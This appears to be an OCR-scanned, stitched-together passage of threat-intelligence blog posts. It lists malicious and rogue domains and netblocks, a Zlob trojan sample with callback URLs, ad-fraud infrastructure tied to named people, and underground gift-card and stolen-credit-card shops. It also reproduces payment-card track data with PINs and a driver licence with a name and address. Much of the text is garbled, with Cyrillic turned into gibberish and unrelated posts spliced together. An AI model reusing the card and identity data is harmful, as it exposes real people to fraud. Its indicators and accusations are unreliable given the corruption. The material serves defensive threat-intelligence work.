can providing the foundations for spear phishing and targeted attacks. 


[7]Quality assurance in spamming is still in its introduction phrase, with customers start- 
ing to put the emphasis on the number of emails that actually made it through the spam 
filters, than the number of emails sent as [8]a benchmark for increasing the probability 
of bypassing anti spam filters. Taking into consideration the big picture, sniffing for email 
addresses streaming out of malware infected hosts, and stealing huge email databases by 
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bitforeat.net 
bI33p0n6373.com 
blackberry.org.mx 
black-bricks.net 
blackwhitebags.com 
blindlydivision.com 
blockedsituation.net 
blogreseller.net 
boldconclusion.com 
booking-tables.com 
bottlehere.com 
boxes-mix.net 
boysrbabies.co 
brand-tech.net 
breakfastisgood.com 
breaking-extranews.online 
breakingnewsasia.com 
breaking-news.co 
breakthenews.net 
br-hashtags.com 
brighttooth.net 
brownandblueeyes.com 
browser-update.online 
br-travels.com 
bubblesmoke.net 
bubblesweetcake.com 
buildingcarpet.com 
buildurlife.net 
buildyourdata.com 
bulbazaur.com 
bulksender.info 
bulktheft.com 
bulk-theft.net 
bullgame.net 
bunchi.club 
bundlestofear.com 
businesssupportme.com 
business-today.info 
bussybeesallover.com 
bustimer.net 
butterdogchange.com 
buymanuel.co 
buypresent4me.net 
bytlo.com 
cablegirls.net 
calculatesymbols.com 
calendarsapp.com 
candlealbum.com 
carpetdignity.com 
carrefour-des-affaires.com 
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cars-to-buy.com 
cartsafer.com 
cashandlife.com 
cashtowebmail.com 
casia-news.info 
catbrushcable.com 
catfoodstorage.net 
catsndogsproducts.com 
cdnupdateweb.com 
cdnwa.com 
celebrateyourdaynow.com 
cell-abonnes.com 
cell-mcel.info 
cellphone-inside.org 
cellphonesprices.com 
cellular-updates.com 
cellularupdates.info 
cellular-updates.online 
centersession.com 
centrasia-news.com 
changesstarted.net 
chatresponses.com 
cheapapartmentsaroundme.com 
cheapcardonline.com 
cheaphostingtoday.com 
cheapmotelz.net 
cheapsolutions4u.com 
cheaptransporting.net 
checkboxcart.com 
checkboxfee.com 
checkinonlinehere.com 
check-my-internetspeed.com 
chickenwaves.com 
chistedeldia.mx 
chocolateicecreamlovers.com 
chocollife.me 
chormnet3.com 
chubaka.org 
classic-furnitures.com 
classstylemap.com 
cleanmiddle.com 
clickrighthere.online 
clicktrack247.com 
clients-access.com 
clockmarkcoffee.com 
closefly.com 
cloudads.net 
cloudbiggest.com 
clubloading.net 
clubmovistar.com 
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clubsforus.net 
cnn-africa.co 
coffecups.online 
coffee2go.org 
colorfulnotebooks.com 
colorsoflife.online 
columbus-parking.com 
companybreakfast.net 
computer-set.com 
com-reports.net 
conditionalcell.com 
conference-ballroom.com 
confusedmachine.com 
connecting-to.com 
contacting-customer.com 
content-blocking.net 
contentsbycase.com 
convertedversion.com 
cookiescom.com 
cookiesoutthere.com 
coolasiankitchen.com 
coolbbqtools.net 
coolmath4us.net 


cool-smartphone-apps.com 


cornclean.com 
cottondecay.com 
countrytrips.net 
coupedumondepro.com 
couponshops. info 
cpr-appointments.com 
crimebackfire.com 
crosslocated.net 
crowndecoration.net 
crownsafe.net 
cryptocurrecny.com 
cryptokoinz.com 
cryptopcoinz.com 
csomagodjott.com 
cssgraphics.net 
cupscars.net 
curiousrabbitgame.com 
currentscan.net 
currentwestpeople.com 
daily-sport.news 
damanhealth.online 
dancersing.net 
dancinglife.co 
dashboardprompt.com 
databasemeans.net 
data-formula.com 
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deadwordsstory.com 
deal4unow.com 
dearlegendseed.com 
delivery-24-7.com 
dental-care-spa.net 
deportesinfo.com 
designednetwork.com 
destinytool.net 
detailrush.net 
deter-individuals.com 
devicer.co 
dhcpserver.net 
diagram-shape.com 
diaspora-news.com 
diningip.com 
dinneraroundyou.com 
directbegins.com 
directlyforuse.com 
directurl-loading.com 
discountads.net 
discountmarkets.info 
discountstores.info 
discoveredworld-news.com 
displaytag.net 
dns-1.co 
dns-analytics.com 
dnsclocknow.com 
dns-direct.net 
dnslogs.net 
dnsmachinefork.com 
dnsprotector.net 
dnsroof.com 
dns-upload.com 
documentpro.org 
dogfoodstorage.net 
dogopics.com 
doitformom.com 
doitforthefame-now.com 
do-itonyour-own.com 
domain-control.net 
domainloading.net 
domainport.net 
domain-redirect.com 
domain-resolver.net 
domain-routing.com 
domainsearching.net 
domain-security.org 
domains-resolver.net 
domesticwindow.com 
donateabox.co 
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donateaflower.com 


donateyouroldclothes.net 


done.events 
donefordeal.com 
doorcoffeebrown.com 
dotroomeight.com 
dowhatyouneed.com 
downgradeproduct.com 
dramatic-challenge.com 
driventicket.com 
eardooraround.com 
earsstrawsfive.com 
easybett.online 
easy-pay.info 
ecommerce-ads.org 
economic-news.co 
editorscolumn.net 
effectivespeech.net 
egov-online.com 
egov-segek.info 
egov-sergek.info 
ehistorybooks.com 
elementscart.com 
eliminateadjust.com 
elitecarz.net 
e-loading.biz 
eltiempo-news.com 
email-plans.com 
emiratesfoundation.net 
emonitoring-paczki.pl 
energy-dispatch.net 
enoughtoday.org 
entertainmentinat.com 
entire-cases.com 
e-prokuror.info 
equal-gravity.com 
erty.online 
estatearea.net 
e-sveiciens.com 
eura-cell.com 
eurasianupdate.com 
eurosportnews.info 
event-reg.info 
everycolor-inside.com 
everyuse.org 
exchangenames.net 
exchangenerate.com 
ex-forexlive.com 
existingpass.com 
exoticsendurance.com 
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expired-getway.net 
expiredsession.com 
expiringdate.com 
exploreemail.net 
extend-list.net 
externalprivacy.com 
externaltransfers.com 
extractsight.com 
extrahoney.net 
eyestoip.com 
eyesunderspray.com 
ezdropshipping.net 
fabric-shops.com 
facebook-accounts.com.mx 
face-image.com 
fadewallwine.com 
fadi7apress.com 
fallround.com 
fallsjuice.com 
familyabroad.net 
fantastic-gardens.com 
fashioncontainer.net 
fashion-live.net 
fashion-online.net 
fashionpark.info 
fastdirect.net 
fastfixs.net 
fatpop.net 
fb-accounts.com 
fosecurity.co 
feature-publish.net 
feelbonesbag.com 
feeltrail.com 
femmedaffaire.com 
fetchlink.net 
fiestamaghreb.com 
files-downloads.com 
filingwarranty.com 
financecomments.net 
findavoucher.online 
findgoodfood.co 
findgroupon.com 
finditout-now.com 
findmyass.org 
findmyfriendsnow.com 
findmylunch.org 
findmymind.co 
findmyplants.com 
findouthere.org 
firebulletfan.com 
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fishingtrickz.com 
fitness-for-ever.com 
flashobligation.com 
flashtraininggoal.com 
flights-report.com 
flights-todays.com 
flying-free.online 
flynewfries.com 
fofopiko.org 
foodeveryhour.com 
foodforyou.info 
foodiez.online 
forgetjustit.com 
formatpainter.net 
formattingcells.com 
forward5costume.com 
forward-page.com 
foto-top.info 
foudefoot.live 
free247downloads.com 
freedominfo.net 
freelancers-team.org 
free-local-events.info 
freeshoemoon.com 
freshandsoftbread.com 
freshsaladtoday.com 
functionalcover.com 
fundum8430.com 
funinat.com 
funinthesun4u.com 
funintheuk.com 
funnytvclips.com 
fwupdating.com 
gadgetproof.net 
gadgetsshop. info 
gate-sync.net 
gdfr.online 
gearstereotype.com 
getagift.info 
getoutofyourmind.com 
getphotosinstant.net 
getpoints.net 
getspeednows.com 
gettingchances.com 
gettingurl.com 
girlimstill.com 
girlsyoulike.com 
glassesofwine.com 
glasstaken.com 
glittercases.net 
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globalcoverage.co 
globalnews247.net 
global-redirect.net 
globalsupporteam.com 
golf-news.live 
goodcookingonline.com 
goodflowersinside.com 
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exploiting vulnerable online communities, seems to be the tactics of choice for the majority of 
individuals whose responsibility is to continuously provide fresh and valid email addresses. 
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web-scanner.co 
websconnector.co 
websiteconnecting.com 
websiteeco.com 
websitereconnecting.com 
websites4yourhost.com 
websitetosubmit.com 
web-spider.net 
webstrings.net 
websupporter.co 
webtunnels.net 
webupdater.net 
web-url.net 
web-viewer.online 
webview-redirect.com 
weddingbandsoft.com 
wedding-strategy.com 
welcomehosting.net 
welovebigcakes.com 
welovelollipops.com 


welovemorningcoffees.com 


wewantflowersnow.com 
whatcanidowithbirds.com 
whatsapp-app.com 
whatsappsupport.net 
whats-new.org 
whereismybonus.com 
whereismyhand.com 
whereismytree.net 
whereisthehat.com 
whynotyesterday.com 
whypillyellow.com 
willpurpleshe.com 
windyone.net 
winfoxflip.com 
winter-balance.com 
wintertimes.co 
wishdownget.com 
without-additional.com 
witness-delay.com 
wonderfulinsights.com 
woodhome4u.com 
wordstore.net 
working-online.net 
workshopmanager.net 
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wraptext.net 
xchange4u.net 
xchangerates247.net 
xn-nissn-3jc.com 
xn-noki-t5b.com 
xn-telegrm-qbd.com 
xtremelivesupport.com 
yOutube.com.mx 
youaresostupid.net 
youcantpass.com 
youintelligence.com 
youliehow.com 
yourbestclothes.com 
yourbestefforts.com 
yourbestvaca.com 
yourgreatestsmartphone.com 
yourhotelreservation.info 
yourlastchance.net 
yousunhard.com 
yummyfoodallover.com 
zednewszm.com 
zm-banks.com 
zm-weather.com 
zsports-info.com 


1. https://1.bp. blogspot .com/-u3LZIyfIgio/YaIHmFc1DGI/AAAAAAAAZAw/ JLu2Z0e j yrORyDvqKOwWxcTqHm0_ORvsACLcBGAsYHQ 
$224/index. png 
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photosgayboys .com 
uniqueincest.com 
shyincest .com 
banrnd.central-xxx .com 
tvisklick .info 

thebg .net 

termion .net 

xoxvids .net 
bestpricepills .net 
bcodecnow .net 


infodist1 .com - (88.214.204.40) 
farmasearch2008 .com 
flaxxvid .com 
xanax777pills .com 
18virgingirls .com 
girlnudegallaryvideox .com 
allxxxpornogerlsx .com 
jproshin .info 

familytaboo .info 
fullsitehost .info 
20searchonlinesite .net 
add-your-video .net 
blogs4y .net 
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[3] 
Stay tuned! 


1. https://1.bp. blogspot .com/-HbmUv3LIP8I/YaNDECdCxJI /AAAAAAAAZA4/vILVZwbEbuYW1nomZbamauIhTqvqLy5UgCLcBGAsYHQ 


s960/1507979_300477460160002_6191312166795480863_n. jp 
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2. https://1.bp.blogspot . com/-LxQstgS00xQ/YaNDECQIxCT / AAAAAAAAZA8/ieQ9j£X_JJQSH2YOIsdw6QkF-ApyYboWQCLcBGASYHQ 
$720/46716401_110352426658319_568824751422701568_n. jp 


3. https://1.bp.blogspot . com/- jrk6FzNNCOg/YaNDGIWciiI/AAAAAAAAZBA/Bn1g1Qq1iVwGYDHA9nN9fE84t81qER- i ACLcBGASYHQ 


s259/index. jpg 


17.11.7 Exposing Aleksandr Zhukov from the Media Methane Rogue Fraudulent and 
Malicious Advertising Enterprise - An OSINT Analysis (2021-11-29 15:28) 


[1] 


. Kazakh Academy of Labour 
Sergey Ovsyannikov + 3rd Se csi Gecksarriie 
Founder and CEO at Flight.kz {2] see contact info 
Kazakhstan = 
Pa 53 connections 


} connect Ia 


Following the recent revelations and actual U.S Do} bust and lawsuit against [2]Aleksandr 
Zhukov from Media Methane responsible for the MethBrowser ad-fraud scheme I’ve decided 
to take a little bit deeper look inside its online infrastructure and actually elaborate more on 
the fraudulent practices applied by the group including to offer practical and relevant action- 
able intelligence in terms of exposing the group’s online infrastructure. 


In this post I'll discuss the group’s online infrastructure and elaborate more on some of the 
key individuals behind the gang with the idea to empower the security community and U.S 
Law Enforcement with the necessary data and information to track down and prosecute the 
cybercriminals behind these campaigns. 


Rogue Company Name: [3]Media Methane 
Rogue Company Product: MethBrowser 
Rogue online infrastructure provider: 


hostlplus / DIGITAL ENERGY TECHNOLOGIES 
inetnum: 179.61.128/17 
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inetnum: 181.41.192/19 
inetnum: 181.214/15 
inetnum: 191.96/16 
inetnum: 191.101/16 
Speed Home Internet LTD 
US online LTD 

Dallas online LTD 

Home Internet Orang LTD 
ATOL Intertnet 

CH wireless 

SecureShield LLC 
HomeChicago Int 

AmOL wireless Net 
Verison Home Provider LTD 
Rogue netblocks known to have been involved in the campaign: 
45.33.224.0/20 
45.43.128.0/21 
45.43.136.0/22 
45.43.140.0/23 
45.43.144.0/20 
45.43.160.0/19 
64.137.0.0/20 
64.137.16.0/21 
64.137.24.0/22 
64.137.30.0/23 
64.137.32.0/20 
64.137.48.0/21 
64.137.60.0/22 
64.137.64.0/18 
104.143.224.0/19 
104.222.160.0/19 
104.233.0.0/18 
104.238.0.0/19 
104.239.0.0/19 
104.239.32.0/20 

18428 


104.239.48.0/21 
104.239.56.0/23 
104.239.60.0/22 
104.239.64.0/18 
104.243.192.0/20 
104.248.0.0/16 
104.249.0.0/18 
104.250.192.0/19 
160.184.0.0/16 
161.8.128.0/17 
165.52.0.0/14 
168.211.0.0/16 
179.61.129.0/24 
179.61.137.0/24 
179.61.196.0/24 
179.61.202.0/24 
179.61.208.0/24 
179.61.216.0/24 
179.61.218.0/23 
179.61.229.0/24 
179.61.230.0/23 
179.61.233.0/24 
179.61.234.0/23 
179.61.237.0/24 
179.61.239.0/24 
179.61.242.0/24 
181.41.199.0/24 
181.41.200.0/24 
181.41.202.0/24 
181.41.204.0/24 
181.41.206.0/23 
181.41.208.0/24 
181.41.213.0/24 
181.41.215.0/24 
181.41.216.0/24 
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181.41.218.0/24 
181.214.5.0/24 
181.214.7.0/24 
181.214.9.0/24 
181.214.11.0/24 
181.214.13.0/24 
181.214.15.0/24 
181.214.17.0/24 
181.214.19.0/24 
181.214.21.0/24 
181.214.23.0/24 
181.214.25.0/24 
181.214.27.0/24 
181.214.29.0/24 
181.214.31.0/24 
181.214.39.0/24 
181.214.41.0/24 
181.214.43.0/24 
181.214.45.0/24 
181.214.47.0/24 
181.214.49.0/24 
181.214.57.0/24 
181.214.71.0/24 
181.214.72.0/21 
181.214.80.0/21 
181.214.88.0/23 
181.214.94.0/23 
181.214.96.0/19 
181.214.160.0/21 
181.214.168.0/22 
181.214.172.0/23 
181.214.175.0/24 
181.214.176.0/20 
181.214.192.0/21 
181.214.200.0/22 
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181.214.214.0/23 
181.214.216.0/21 
181.214.224.0/20 
181.214.240.0/22 
181.215.5.0/24 
181.215.7.0/24 
181.215.9.0/24 
181.215.11.0/24 
181.215.13.0/24 
181.215.15.0/24 
181.215.17.0/24 
181.215.19.0/24 
181.215.21.0/24 
181.215.23.0/24 
181.215.25.0/24 
181.215.27.0/24 
181.215.29.0/24 
181.215.31.0/24 
181.215.33.0/24 
181.215.35.0/24 
181.215.37.0/24 
181.215.39.0/24 
181.215.41.0/24 
181.215.43.0/24 
181.215.45.0/24 
181.215.47.0/24 
181.215.50.0/23 
181.215.52.0/22 
181.215.56.0/21 
181.215.64.0/20 
181.215.80.0/21 
188.42.0.0/21 
191.96.0.0/24 
191.96.16.0/24 
191.96.18.0/24 
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191.96.21.0/24 
191.96.23.0/24 
191.96.29.0/24 
191.96.30.0/24 
191.96.39.0/24 
191.96.40.0/23 
191.96.43.0/24 
191.96.44.0/22 
191.96.50.0/23 
191.96.52.0/22 
191.96.56.0/22 
191.96.60.0/23 
191.96.62.0/24 
191.96.69.0/24 
191.96.70.0/23 
191.96.72.0/23 
191.96.74.0/24 
191.96.76.0/22 
191.96.80.0/21 
191.96.88.0/22 
191.96.92.0/24 
191.96.94.0/24 
191.96.96.0/23 
191.96.108.0/23 
191.96.110.0/24 
191.96.113.0/24 
191.96.114.0/24 
191.96.116.0/23 
191.96.119.0/24 
191.96.120.0/23 
191.96.122.0/24 
191.96.124.0/22 
191.96.133.0/24 
191.96.134.0/24 
191.96.138.0/24 
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adult-shemale .com - (88.214.198.25) 
adult-tranny .com 

all-shemale .com 

bcodecnow .net 

best-tranny .com 
bestguyportal .com 
bestmoviez .com 

central-xxx .com 
downlfreesexgirlbeach .com 
gallery-boy .com 
hiosexywomensxxxgirlsx .com 
lady-dick .com 

bcodecnow .net 
mytoppharmacy .com 
nakednudeboys .com 
nakednudemen .com 
nudenakedboys .com 

only-bi .com 
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191.96.140.0/24 
191.96.145.0/24 
191.96.148.0/24 
191.96.150.0/24 
191.96.152.0/21 
191.96.160.0/22 
191.96.164.0/24 
191.96.168.0/24 
191.96.170.0/24 
191.96.172.0/24 
191.96.174.0/24 
191.96.177.0/24 
191.96.178.0/23 
191.96.182.0/24 
191.96.185.0/24 
191.96.186.0/23 
191.96.189.0/24 
191.96.190.0/24 
191.96.193.0/24 
191.96.194.0/24 
191.96.196.0/22 
191.96.200.0/23 
191.96.203.0/24 
191.96.210.0/24 
191.96.212.0/23 
191.96.214.0/24 
191.96.221.0/24 
191.96.222.0/23 
191.96.226.0/23 
191.96.232.0/24 
191.96.234.0/23 
191.96.236.0/23 
191.96.239.0/24 
191.96.244.0/24 
191.96.246.0/24 
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191.101.25.0/24 
191.101.36.0/22 
191.101.40.0/21 
191.101.128.0/22 
191.101.132.0/23 
191.101.134.0/24 
191.101.146.0/23 
191.101.148.0/23 
191.101.176.0/23 
191.101.182.0/24 
191.101.184.0/22 
191.101.188.0/23 
191.101.192.0/22 
191.101.196.0/23 
191.101.204.0/22 
191.101.216.0/22 
191.101.220.0/24 
191.101.222.0/23 
196.62.0.0/16 
204.52.96.0/20 
204.52.112.0/22 
204.52.116.0/23 
204.52.120.0/23 
204.52.122.0/24 
204.52.124.0/22 
206.124.104.0/21 
209.192.128.0/19 
216.173.64.0/18 
Rogue domains known to have been involved in the campaign: 
adzos.com 
clickandia.com 
webvideocore.com 
clickservers.net 
clickmediallc.net 


mobapptrack.com 
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rtbclick.net 

xmlsearchresult.com 

Sample personal email address accounts known to have been involved in the campaign: 
adwOrd.yandex.ru@gmail.com 

clickandia@yahoo.com 

Rogue Facebook profiles belonging to company employees include: 
https://www.facebook.com/oleksandr.beletskyi 


https://www.facebook.com/rowan. villaluz 


[4] 


Oleksandr Beletskyi » Neon Tommy 
11 apryct 2016. -@ 


Hello, 

| am Alex from Adzos.com. We are looking for perspective cooperation with 
websites, buying its ads places. 

Can you put in the contact with someone, who can help me? 

Sincerely, Alex 


[5] 


ADZOS COM Adzos Publishers Advertisers Contacts @login # SignUp 


Push your business to the next lev@lauas 
Effortlessly. 


© Join us now 


Po p u n d e if Take advantage of our global reach program to squeeze the most of your business: actweve sky-high 
revenue results in record short time! The non-intrusive advertising demonstrates spectacular 
Ad Formats conversion, while the relevance leaves simply nothing to be desired. A totally powerful instrument 


why not give it a try? 
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clickandia.com 


¥ 
2021-08-10 07:08:20 UTC 


clickandia.com 


clickandia@yahoo.com 


[6] 


[7] 


[8] 
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Why Publishers love Adzos? 


We play for real. Guided by an ambitious, long-term strategy we achieve milestone after milestone and do it in a timely fashion, 
just according to the plan. Now we proudly admit we do offer a truly global reach, and it’s not about rending the air. In 2014 the 
list of industries we specialize was significantly expanded - we've plunged into 56 areas which is equal to a 27% increase. In 
2015 we are looking to press for another 30% growth, and we are doing great so far. In the world of technology we bet on 
technology - we gather programming, design and marketing gurus to create an ideal revenue-growth ecosystem. 


Laser-guided campaigns, designed to squeeze the most of investments and leaving competitors in the dust is the main 
reason why publisher make a choice in our favour. Become a part of an ambitious community and a global plan - join us and 
make your business prosper. 


<4 


Transparency and 
straight dealing 


4 


A variety of payment options 


Bi-weekly payouts, 


holds and delays-free 


faxum PaYoneer PayPal 


There is also an opportunity for referral programs - Eam 5% for everyone you bring to our system. 


[9] 


Popunder Direct Click JS Blocks XML Feed 
Popunder is a new window in the Direct click is a time-tested. proven Arm your pages with Javascript It is all about pasting an XML code 
browser displayed to the visitors. technique almost as old as blocks to make money from catchy, to get started - simple and easy, 
As a publisher you eam money internet. Direct click tools eam you relevant ads. Enhance conversion you can either keep it conducting 
each time a visitor views it, so pay money each time a visitor clicks on and get even higher payouts - its business or adjust it to your 
per impression model is applicable them A multitude of forms, perfect enjoy the benefits of being our needs. XML feed boasts 

here. Popunder method has customizability and traditionally premium advertising partner. unsurpassed customizability, so 
proved itself as a highly-efficient decent payments per click is savvy publishers can go even 
income generating method. something that you will certainly further and improve its 
effectiveness 


like about Direct Click 


[10] 
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[11] 


[12] 


[13] 
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0,40 KB/e OS ® wl & 71% Co 


X 


U3 White Ops HuKTO 

He O6pauianca, v3 
npaBooxpaHuTenbHbIX OpraHoB 
Toe. A AymMal, ecnu opraHbi 
6yAyT pas6uparTeca, To noumyT, 
4TO A OTHOWEHMA HUKakoro He 
umeto K Methbot. A Tem 6onee 
K TaKUM CYMMaM, KOTOpbie 
ABHO 3aBbIWeHbI (Tak CUMTalOT 
v cneuwanucTb! B O6nacTu 
peknamblI), BbIFNAQUT Tak, YTO 


White Ops npocTo nuaputca 
11:46 


Tow NouTOW A He BNagen, 
npo6oBan nonyynTb K Hen 
AOcTyn, HO TaM yKa3aH HOMep 
Tenedoua (nocnegHue 2 undpbi 
HOMepa), KOTOPbIM A TONHO HE 
Bnageto vu He BNagen — 


AcHo! Cnacu60 6onbwoe! OveHb 


@ Bawe coo6wexHne hy Q 


[14] 
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22 neka6pa 2016 
|: Aaa ee MHe 


COO6WIMN Apyr, KOTOpbIA UNTaeT 
nogo6uHble u3sfaHua. 


A He UMelO HUKakoro OTHOWEHMA 
K Methbot. 


Zombie u cheerio o6bI4uHbIe, 
noBceAHeBHbie 6u6nuoTeku 

Ana TecTMpoBaHua uv KpaynuHra 
CaiiTOB, KOTOpble UCNONb3ytoT 
TbICAUM NporpammnucrToB. Kpe6c 
NpocTo NpuTaruBaeT 3a YUM BCIO 
ucToputo ee 


HO TaM Ke ele HK Bal 
cospnagaerT. A OH AOCTaTOYHO 


peaknin 11:43 
U3 White Ops HuKTo 
He O6pawanca, v3 — 
NpaBooxpaHuTeNnbHbIx Oprar. - 
Toe. A QvMalo. ecnu opraHbi 
@ Bawe coo6wenne ‘@) Q 
[15] 
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fla, KOHeEYHO. YTpom 6e3 
npo6nem. MHe uHTepecHo, Kak 

Bb! BOO6Le y3HasM, NPO CTaTbIO 
Kpe6ca? Boi fevicTBUTeENbHO 
UMeeT OTHOWEHME K Methbot? 
3a4em BbI y3HaBann 
nogpo6xHoctu o Zombie u Cheerio? 
K Bam o6paujanca KTO-HU6yfb U3 
KomnaHun White Ops, KoTopaa 
ony6nukoBana OTYeET, “NK U3 
npaBooxpaHuTenbHbIX OpraHoB 
no stomy Aeny? 01:06 


Muxaun, go6ppii AeHb! Mue 
HY>KHO BbINYCKaTb CTaTbl0 U 
O4eHb XOYeETCA, YTO6bI Tam 6biINa 
BaWa Bepcua Co6bITMK. MHe 
Ka@KeTCA, YTO 6bINO 6bI YECTHO 
faTb BaM CNOBO vu ONny6NuKOBaTb 
Baw KOMMeHTapun 11-06 


NMpo cTaTbto Kpe6ca MHe 
COO6LIMN ADV, KOTODbIN “NTaeT 


GO Bawe coo6uieHne ©) Q 


[16] 
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12,4 KB/e OS ® wll = 71% Co 


X 


22 neka6pa 2016 


Muxann, A06pbIi AeHb! 

MeHal 30ByT Sigal cee, 9 
KYPHAs/IMCT M3 MH3g4aHuUA Republic. 
A cenyac nuwy CTaTbto Npo 
6o0THeT Methbot, uv sanagHbie 
9KCNepTbI CYUTAICT, YTO BbI 
NpuyacrTHb! K ero CO3AaHUW. 
Mo>KHO BaM HECKONbKO BONPOCOB 
3anatTb? 


Mo>KHO, HO OTBeYy TONbKO YTPOM 
00:28 


fla, KoHeYHO. YTpom 6e3 
npo6nem. MHe UHTepecHo, Kak 

Bb! BOOGIE Y3HaNU, NPO CTaTbIO 
Kpe6ca? Boi evcTBUTeENbHO 
UMeeT OTHOWEHME K Methbot? 
3ayem BbI y3HaBann 
nogpo6xHoctu o Zombie u Cheerio? 
K Bam O6paujanica KTO-HU6yfb U3 
KOMNaHunu White Ops, KoTopaa 


Rcssesi ese Rs econ Rs cone Ric nc 


Dashboard 


Today This Month Unpaid Balance 


Clicks az Clicks pois 
Revenue ew Revenue $361 ma 
Avg. Bid Be ad Avg. Bid 
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only-shemale .com 
page-reviews .com 
paulaslosingit .com 
photosgayboys .com 
stud-boys .com 
theOdownload .com 

wikiei .com 

moviez .com 
hiosexywomensxxxgirlsx .com 
sexygirlsisuniformhOt .com 
theOdownload .com 


flwprocedure .com - (77.91.231.201) 
movupdate .com 
flwupdate .com 
formatmpeg .com 
movieexternal .com 
flwtool .com 
aviexecution .com 
releasedvideo .com 
wmvcompressor .com 
movieopens .com 
mpegapparatus .com 
flwassistant .com 
flwinstrument .com 
piterserv .com 
wovview .com 


Some info on a sample codec : 

Scanners Result: 11/36 (30.56 %) 
Trojan-Downloader.Win32.Zlob.cos 

Trojan.Popuper.7315 

File size: 10240 bytes 

MD5...: 467e4e78974dc8b2ee5d7da024daf31a 

SHA1..: 311e0c710bb15761lef3dace54b55489830cf5803 


Phones back to 69.50.164.50/this/is/stereo/music.php?pa ram=0;1314;1550; 
69.50.164.50/this/is/stereo/jazz.php?par am=49325611;2:191:5|7:271:0|6:130:0|9:0:5- 
|34:65536:0 and to 85.255.119.244/this/is/stereo/music.php?param=0;4135;1548. 


When Emil Kaperski’s owned [3]lnterCage, Inc. (69.50.164.50) meets [4]UkrTeleGroup 
Ltd. (85.255.119.244) previously known as Andrei Kislizin’s owned InHoster, you know you’re 
on the right track. 


ttp://ddanchev. blogspot .com/2008/06/fake-porn-sites-serving-malware.htm 
ttp://ddanchev.blogspot.com/2008/07/fake-porn-sites-serving-malware-part .htm 


1. 
2. 
3. http://ddanchev. blogspot. com/2008/06/malicious-isps-you-rarely-see-in-any .htm 
4. http://ddanchev. blogspot .com/2008/07/lazy-summer-days-at-ukrtelegroup-l1tds.htm 
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Ty. , a 
NEW YORK STATE 
DRIVER LICENSE esdare 
0489 186 062 Gass D 
SCHAVE 
— CHRISTOPHER 


10 CITY POINT 248 
BROOKLYN NY 11201 


TEMP. VISITOR 11/21/2020 
M 6'¢ yes BRO 
o4siarieaso 
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4.8.24 Facebook Malware Campaigns Rotating Tactics (2008-08-27 14:18) 


Trust is vital, and coming up with ways to multiply the trust factor is crucial for a successful 
[1]malware campaign spreading across social networks. Excluding the publicly available mal- 
ware modules for spreading across [2]popular social networking sites, using the presumably, 
[3]already phished accounts for the foundation of the trust factor, the recent malware cam- 
paigns spreading across Facebook and Myspace are all about plain simple social engineering 
and a combination of tactics. 


Loading Site...in the mean time 
A/S/L PLZ! 


However, in between combining typosquatting and on purposely introducing longer subdo- 
mains impersonating a web application’s directory structure, there are certain exceptions. 
Like this flash file hosted at ImageShack and spammed across Facebook profiles, which at a 
particular moment in the past few days used to redirect to client-side exploits served on behalf 
of a shady affiliate network that’s apparently geolocating the campaigns based on where the 
visitors are coming from. 
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Pin: 7165 


Track 1: %B4798531210795094*Zore 
69000000? NA 
Track 2 : 4798531210795094 =220610153703669000 
Pin : 3133 


Track 1: %B4798531210795094*Madison*2510101537035 
0? = am 

Track 2 : 4798531210795094=25101015370397; 
Pin : 5449 Te ™ 


= 


The primary purpose for coming up with such a service would be to empower novice and expe- 
rienced cybercriminals with the necessary information to further commit related and relevant 
cybercrime-friendly activities which also includes the ability to fake or spoof a new identity 
which could lead to related fraudulent and rogue cybercrime-friendly online schemes. 
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17.12.2 Sample Rogue and Stolen Gift Cards Offered for Sale on the Underground 
Marketplace - An Analysis (2021-12-04 09:51) 


I’ve recently stumbled upon a currently active underground forum market proposition for 
stolen and fraudulently obtained online E-Shop gift cards and I’ve decided to share some of 
the key factor propositions based on the original proposition which I'll profile in this post. 


Sample screenshots based on the original underground forum market proposition: 
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No Service @ GH 10:58 AM @ 67% + 


< My Gift Cards Wg > 9 


Gift Cards Points Balance: 252042 


Adidas + 
2 Cards: $500 


Amazon.com Gift Card + 
20 Cards: $5000 


American Eagle Outfitters 
10 Cards: $2000 


Ebay 
5 Cards: $1000 


iTunes 
7 Cards: $2500 


Nike 
10 Cards: $5000 1 Unclaimed Cards 


Nordstrom 
5 Cards: $2000 


Sony Playstation 
1 Card: $50 


The Home Depot 
9 Cards: $1950 


Add a Plastic Card 


The vendor in question is offering a pretty decent inventory of various gift cards from major U.S 
based E-Shops and online retailers where users can buy them and facilitate additional fraud 
and fraudulent schemes and mechanisms. 


17.12.3 Profiling a Newly Launched E-Shop for Stolen Credit Cards Data - An Analysis 


(2021-12-04 11:24) 


[1] 
18457 


CARD BRAND 


Database zip 


ountries A States All Databases All Zip 


Bank Name Card Level 


All Bank All Card Levet 


AMERICAN EXPRESS 
COMPANY 

GB 
United_Kingdom ZIP 


CITI AMERICAN EXPRESS [SNIFFED/FIRSTHAND] Jateen_Patel City: York 
c 5 . YO3O_6NY 
United_Kingdom 


475141 DEC#3US/MIX_[SNIFFED/FIRSTHAND]) Amber = =: 
City: Derby 


I’ve just stumbled upon a newly launched and currently active E-Shop for stolen credit cards 
information and I’ve decided to take a deeper look potentially exposing it and offering action- 
able intelligence on its online infrastructure part of the "[2]Exposing the Market for Stolen Credit 
Cards Data" blog post series. 


Sample domains involved in the campaign include: 

hxxp://majorcc.shop/ 

hxxp://majorcc.store/ 

hxxp://majorcc.ru 

Sample Dark Web Onion known to have been involved in the campaign: 
http://xktoxobz3jv6epntuj5ws7ncé6zuihfroxziprd5np5xkbby4nzmmmiyd.onion 

Sample screenshots of the rogue and fraudulent E-Shop for stolen credit cards information: 


[3] 


CARD BRAND 


7m ~s 


COUNTRY STATE oITY Database 


All Countries All States All Cities Al Databases 


Bank Name Card Level 


All Bank All Card Level 


Al Card Leve! 


PEONY EXPRESS 


PLATINUM 
GREEN 


CENTURION United_Kinad GB 
492181 DEC#3US/MI| coup caus Vek ane $12.00 
ca YO30_6NY 


gb 


47514 
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[11] 
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img228.imageshack _ .us/img228/3238/gameonit4.swf redirects to ermacysoffer .info - 
(216.52.184.243) and to tracking.profitsource .net (67.208.131.124) that’s also responding to 
p223in.linktrust .com (67.208.131.124). Just for the record, we also have halifax-cnline.co.uk 
parked at 216.52.184.243, 69.64.145.229 and 69.64.145.229, known badware IPs related to 
previous fraudulent activity. 


er wrote on s Wall. 


Hi! Guess what? You have a Secret Admirer! LoL 
See who it is here http://Whitneyganykus .blog 


See Wall-to-Wall 


Moreover, cross-checking this campaign with [4]Janother Facebook malware campaign 
enticing users to visit whitneyganykus.blogspot .com where a javascript obfuscation 
redirects to absvdfd87 .com and from there to the already known tracking.profitsource 
